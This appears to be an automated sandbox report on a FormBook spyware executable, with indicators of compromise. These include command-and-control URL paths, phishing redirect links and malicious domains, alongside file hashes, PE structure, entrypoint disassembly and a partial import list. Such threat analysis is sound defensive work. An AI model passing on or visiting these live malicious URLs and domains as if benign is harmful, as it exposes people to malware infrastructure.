                                                          Overall analysis duration:0h 9m 14s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:8
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:H1CYDJ8LQe.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@10/6
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 97%
                                                          • Number of executed functions: 50
                                                          • Number of non-executed functions: 307
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target SwTeWVAxKdsP.exe, PID 2020 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: H1CYDJ8LQe.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:42:44API Interceptor6882399x Sleep call for process: dvdplay.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          8.217.17.192z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                          • www.meliorahomes.net/x0tl/
                                                          shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.meliorahomes.net/v6hi/
                                                          213.249.67.10VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                          • www.onlineblikje.online/w27a/
                                                          QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                          • www.onlineblikje.online/z0t0/
                                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                                          • www.onlineblikje.online/wp9q/?74=Wcq5nto4Pys/VvLEf2lJ/6Zw/QsAH/mOKDhTh8E2UkIGdNowS/NkUBtnEOdEZ1QRI1rqIZGZ3d2iBtPWddII6c2xOxLt6j8Q/ledcZJmmPQke33bUPdbyjY=&jf=kjpL5
                                                          PO59458.exeGet hashmaliciousFormBookBrowse
                                                          • www.onlineblikje.online/mgmi/
                                                          161.97.142.144p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002832.xyz/o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8
                                                          r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002304.xyz/jkxr/
                                                          COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002059.xyz/4h9e/
                                                          Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002107.xyz/fnq1/
                                                          A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002107.xyz/e8he/
                                                          VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002832.xyz/2nyl/
                                                          FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002803.xyz/o3vr/
                                                          Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002059.xyz/2sun/
                                                          Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • www.030003548.xyz/ochg/
                                                          Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                          • www.030002059.xyz/2sun/
                                                          184.94.215.26rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                          • www.namcist.xyz/h6bx/
                                                          Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                          • www.hellosmall.info/skre/
                                                          Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                          • www.guplace.xyz/s0g5/
                                                          SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                          • www.tribevas.online/io0i/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.meliorahomes.netrInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                          • 8.217.17.192
                                                          z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                          • 8.217.17.192
                                                          shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 8.217.17.192
                                                          www.onlineblikje.onlineVkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          PO59458.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          www.bdipjg.asiaPO59458.exeGet hashmaliciousFormBookBrowse
                                                          • 78.141.202.204
                                                          www.030002832.xyzp4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          METAREGISTRARNLVkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          PO59458.exeGet hashmaliciousFormBookBrowse
                                                          • 213.249.67.10
                                                          https://pt.surveymonkey.com/tr/v1/te/sye1khVpXMoAOA1o9dS7KswyeoXWRMc0CsiALAVvL9R1AEKLpDw_2FQ_2BjGpzqh9gEIleg14i6r7hX4PBEN8h0srmKEUKwP1mLRZLbUUusCb9ijP9SUb3shd8eAxCFYZdX_2BMEbjAe9Z41yfltVavABteyxJzvgHPE3p8pCRndVvaQ4_3DGet hashmaliciousUnknownBrowse
                                                          • 213.249.67.13
                                                          SaLY22oLht.exeGet hashmaliciousUnknownBrowse
                                                          • 213.249.66.9
                                                          https://plsdworkiqs.com/Get hashmaliciousUnknownBrowse
                                                          • 213.249.67.40
                                                          http://213.249.67.13/plesk-site-preview/chpostcrn.com/https/213.249.67.13/PostCH/Get hashmaliciousUnknownBrowse
                                                          • 213.249.67.13
                                                          VXCHNGE-NC01USrDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                          • 184.94.215.26
                                                          Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                          • 184.94.215.26
                                                          Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                          • 184.94.215.26
                                                          SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                          • 184.94.215.26
                                                          https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDs09VcyycT&sa=t&esrc=s09VcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJC1GniFlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F4905038053/#bGVvbi5sYXZpbkB5b2RlbC5jby51aw===$%E3%80%82Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                          • 184.94.212.131
                                                          FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                          • 184.94.212.115
                                                          FirstfedwebInv27-1486.htmlGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                          • 130.250.191.5
                                                          https://lookerstudio.google.com/s/mPdl62g0mi8Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                          • 184.94.212.131
                                                          DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                          • 184.94.212.115
                                                          https://buysuhagra.shop/ePFcjxsxGet hashmaliciousHTMLPhisherBrowse
                                                          • 184.94.212.117
                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCEn88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                          • 8.210.49.139
                                                          mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                          • 47.242.252.174
                                                          arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 47.251.12.143
                                                          sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                          • 8.212.58.110
                                                          https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                          • 47.251.66.114
                                                          QH6Ue0xtNZ.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                          • 8.218.85.22
                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                          • 8.215.187.97
                                                          nullnet_load.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 8.221.93.251
                                                          nullnet_load.i486.elfGet hashmaliciousMiraiBrowse
                                                          • 47.241.252.253
                                                          NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                          • 8.210.3.99
                                                          CONTABODEp4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 164.68.127.9
                                                          COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          evhopi.ps1Get hashmaliciousLummaCBrowse
                                                          • 173.249.62.85
                                                          Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                          • 161.97.132.254
                                                          https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                                          • 173.249.62.84
                                                          Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.142.144
                                                          New Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                          • 161.97.168.245

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\V61227L8-

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\dvdplay.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):114688
                                                          Entropy (8bit):0.9746603542602881
                                                          Encrypted:false
                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\slashing

                                                          Download File
                                                          Process:C:\Users\user\Desktop\H1CYDJ8LQe.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288256
                                                          Entropy (8bit):7.995798245243465
                                                          Encrypted:true
                                                          SSDEEP:6144:gJeejH1qbspJXBFVWS5qBM0CPqkDePBNXlIY75Ibvf:gFqc13VWS5q20QqDPBNXDFID
                                                          MD5:90D4A429265E686EB29945C2DC31D3DD
                                                          SHA1:CBFEBCE03AD42C2CB03D520627EFF82B2F467F8F
                                                          SHA-256:403CA5888074EDE128AC1BE3CBBAE307D41A57E6089BAE8323103C0DDFF69383
                                                          SHA-512:7CDCF344830F0F6A60FBBE4EBD9C0C5EDE91F1B5E568EB83543CD987C839616B0187F9F82B6E37BD4018D679A71476F8CC7D28221D4B95EC742AC28B5E5A7175
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.....P4MP...M....u.GZ...mM[...P4MPB2WDW78XIUGYC8NENSPJRP4MPB.WDW9'.GU.P...D..q.:9Gm 0]066Z.;(;)67., n!%$r9Zm..aw)8S]vDXM}C8NENSP3SY.p0%.j$0..8..]...t%).J....-7.(...X?...:+..".SPJRP4MP.wWD.69X....C8NENSPJ.P6L[C9WD.38XIUGYC8N.ZSPJBP4M F2WD.78HIUG[C8HENSPJRP2MPB2WDW7H\IUEYC8NENQP..P4]PB"WDW7(XIEGYC8NE^SPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4c$'J#DW7..MUGIC8N.JSPZRP4MPB2WDW78XIuGY#8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NENSPJRP4MPB2WDW78XIUGYC8NE

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.469636735149665
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:H1CYDJ8LQe.exe
                                                          File size:1'517'995 bytes
                                                          MD5:8afeae6ec5433e3f0c6903fc107fa851
                                                          SHA1:3e0ed7af55e709fa0bb5c744f59bd94a8f8ab2bf
                                                          SHA256:ff969b79ea4daf4a820a4c21a8d1f8e66d25290902e2e9f131a4a88bb8f5def3
                                                          SHA512:70943df1d0f00d4dd5445f2d6f0ebccaf5f660a58f14b89dfeb6ca339d4f319986f9b5b2c59742a1f3ffbe2564ffb5047115a578820687e07c19564aa5fce9b6
                                                          SSDEEP:24576:KRmJkcoQricOIQxiZY1iaLYus0JMLK15E/ZL4raBisIZx/thFl6TolquiV8q:PJZoQrbTFZY1ia0gJMLUah4r/rnf6To2
                                                          TLSH:3A65F221B9D9C031D2E366B0AE76F35AA53CA523033EE69723C41E354FE45523B29763
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                          File Icon

                                                          Icon Hash:145cfcf8f2e8cc52

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4165c1
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007FB9F87CB92Bh
                                                          jmp 00007FB9F87C279Eh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [ebp+0Ch]
                                                          mov ecx, dword ptr [ebp+10h]
                                                          mov edi, dword ptr [ebp+08h]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007FB9F87C291Ah
                                                          cmp edi, eax
                                                          jc 00007FB9F87C2AB6h
                                                          cmp ecx, 00000080h
                                                          jc 00007FB9F87C292Eh
                                                          cmp dword ptr [004A9724h], 00000000h
                                                          je 00007FB9F87C2925h
                                                          push edi
                                                          push esi
                                                          and edi, 0Fh
                                                          and esi, 0Fh
                                                          cmp edi, esi
                                                          pop esi
                                                          pop edi
                                                          jne 00007FB9F87C2917h
                                                          jmp 00007FB9F87C2CF2h
                                                          test edi, 00000003h
                                                          jne 00007FB9F87C2926h
                                                          shr ecx, 02h
                                                          and edx, 03h
                                                          cmp ecx, 08h
                                                          jc 00007FB9F87C293Bh
                                                          rep movsd
                                                          jmp dword ptr [00416740h+edx*4]
                                                          mov eax, edi
                                                          mov edx, 00000003h
                                                          sub ecx, 04h
                                                          jc 00007FB9F87C291Eh
                                                          and eax, 03h
                                                          add ecx, eax
                                                          jmp dword ptr [00416654h+eax*4]
                                                          jmp dword ptr [00416750h+ecx*4]
                                                          nop
                                                          jmp dword ptr [004166D4h+ecx*4]
                                                          nop
                                                          inc cx
                                                          add byte ptr [eax-4BFFBE9Ah], dl
                                                          inc cx
                                                          add byte ptr [ebx], ah
                                                          ror dword ptr [edx-75F877FAh], 1
                                                          inc esi
                                                          add dword ptr [eax+468A0147h], ecx
                                                          add al, cl
                                                          jmp 00007FB9FAC3B117h
                                                          add esi, 03h
                                                          add edi, 03h
                                                          cmp ecx, 08h
                                                          jc 00007FB9F87C28DEh
                                                          rep movsd
                                                          jmp dword ptr [00000000h+edx*4]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2010 SP1 build 40219
                                                          • [C++] VS2010 SP1 build 40219
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2010 SP1 build 40219
                                                          • [RES] VS2010 SP1 build 40219
                                                          • [LNK] VS2010 SP1 build 40219

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x389c0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xab0000x389c00x38a00209d9a28b1f7cc093888bdcf80f94fddFalse0.46523609961368656data6.550670989017651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xab9400xe0bePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9943859283206452
                                                          RT_ICON0xb9a000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.2501330888441973
                                                          RT_ICON0xca2280x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.30849274752995587
                                                          RT_ICON0xd36d00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.31963955637707947
                                                          RT_ICON0xd8b580x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.3098134152102031
                                                          RT_ICON0xdcd800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.3566390041493776
                                                          RT_ICON0xdf3280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.4268292682926829
                                                          RT_ICON0xe03d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.49631147540983606
                                                          RT_ICON0xe0d580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5886524822695035
                                                          RT_MENU0xe11c00x50dataEnglishGreat Britain0.9
                                                          RT_DIALOG0xe12100xfcdataEnglishGreat Britain0.6507936507936508
                                                          RT_STRING0xe13100x530dataEnglishGreat Britain0.33960843373493976
                                                          RT_STRING0xe18400x690dataEnglishGreat Britain0.26964285714285713
                                                          RT_STRING0xe1ed00x4d0dataEnglishGreat Britain0.36363636363636365
                                                          RT_STRING0xe23a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xe29a00x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xe30000x388dataEnglishGreat Britain0.377212389380531
                                                          RT_STRING0xe33880x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                          RT_GROUP_ICON0xe34e00x84dataEnglishGreat Britain0.75
                                                          RT_GROUP_ICON0xe35680x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0xe35800x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0xe35980x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0xe35b00x19cdataEnglishGreat Britain0.5339805825242718
                                                          RT_MANIFEST0xe37500x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, 